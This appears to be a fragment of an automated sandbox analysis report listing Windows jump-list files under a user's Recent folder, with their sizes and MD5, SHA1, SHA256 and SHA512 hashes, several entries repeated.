SHA25640b04afd47861b9af185c55d8ee670a9aeaa4c3cc98398b60ad0d451843e2a69
SHA5129e4e2e50d811bdfbf15abb55c0081549eaf63020dab6c54c376c848fd0a8cf5bd221f91fe2d5237a890fa6536c2253ec4ba7d461bfd57620625dccba64244e93
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XM8ZBX40FDQ0I7Y5XUPG.temp
Filesize7KB
MD593aaddaa3e0931514726f4c5f09a7665
SHA12d2e38fcec1d2b80c1a73e16009b4792e8cf714b
SHA256abc6bf848b8034ffa522cfaf5b0d879a552ca22a9dfe454f6f08441e142ce477
SHA51247e376ec9e474236b22cb55be4d53f8e62a66dee052444a139d7b998a6a820d8d84455eb3f5d2101718fb5aa0d907d9be1c409cb934d43945744b32413f0e98e
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD593aaddaa3e0931514726f4c5f09a7665
SHA12d2e38fcec1d2b80c1a73e16009b4792e8cf714b
SHA256abc6bf848b8034ffa522cfaf5b0d879a552ca22a9dfe454f6f08441e142ce477
SHA51247e376ec9e474236b22cb55be4d53f8e62a66dee052444a139d7b998a6a820d8d84455eb3f5d2101718fb5aa0d907d9be1c409cb934d43945744b32413f0e98e
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD593aaddaa3e0931514726f4c5f09a7665
SHA12d2e38fcec1d2b80c1a73e16009b4792e8cf714b
SHA256abc6bf848b8034ffa522cfaf5b0d879a552ca22a9dfe454f6f08441e142ce477
SHA51247e376ec9e474236b22cb55be4d53f8e62a66dee052444a139d7b998a6a820d8d84455eb3f5d2101718fb5aa0d907d9be1c409cb934d43945744b32413f0e98e
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD593aaddaa3e0931514726f4c5f09a7665
SHA12d2e38fcec1d2b80c1a73e16009b4792e8cf714b
SHA256abc6bf848b8034ffa522cfaf5b0d879a552ca22a9dfe454f6f08441e142ce477
SHA51247e376ec9e474236b22cb55be4d53f8e62a66dee052444a139d7b998a6a820d8d84455eb3f5d2101718fb5aa0d907d9be1c409cb934d43945744b32413f0e98e
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD55836772ea003a5298b48c9664f9bb2e1
SHA129830dca2d68d3bc2ecca975a3907f7d770c81b4
SHA25640b04afd47861b9af185c55d8ee670a9aeaa4c3cc98398b60ad0d451843e2a69
SHA5129e4e2e50d811bdfbf15abb55c0081549eaf63020dab6c54c376c848fd0a8cf5bd221f91fe2d5237a890fa6536c2253ec4ba7d461bfd57620625dccba64244e93
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD55836772ea003a5298b48c9664f9bb2e1
SHA129830dca2d68d3bc2ecca975a3907f7d770c81b4
SHA25640b04afd47861b9af185c55d8ee670a9aeaa4c3cc98398b60ad0d451843e2a69
SHA5129e4e2e50d811bdfbf15abb55c0081549eaf63020dab6c54c376c848fd0a8cf5bd221f91fe2d5237a890fa6536c2253ec4ba7d461bfd57620625dccba64244e93
-
Filesize
129B
MD5a526b9e7c716b3489d8cc062fbce4005
SHA12df502a944ff721241be20a9e449d2acd07e0312
SHA256e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066
SHA512d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88
-
Filesize
129B
MD5a526b9e7c716b3489d8cc062fbce4005
SHA12df502a944ff721241be20a9e449d2acd07e0312
SHA256e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066
SHA512d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88
-
Filesize
6KB
MD539728325879572ffe56a194319f2731f
SHA13898a219352dd3aedc54ff924b01317107c9ce2f
SHA2568e3ff1907d973d91167c2d74ac8414496d7f430687eef52e3201721e01513761
SHA5127d80af3e2df1c02bfda76e5ada4b4ce25921418cfcd7f26434293e746968f4187f6c9cf5bbb1c7c4703117eaabdd958700f7b1cefcfa44bd11afe95ad7f1599b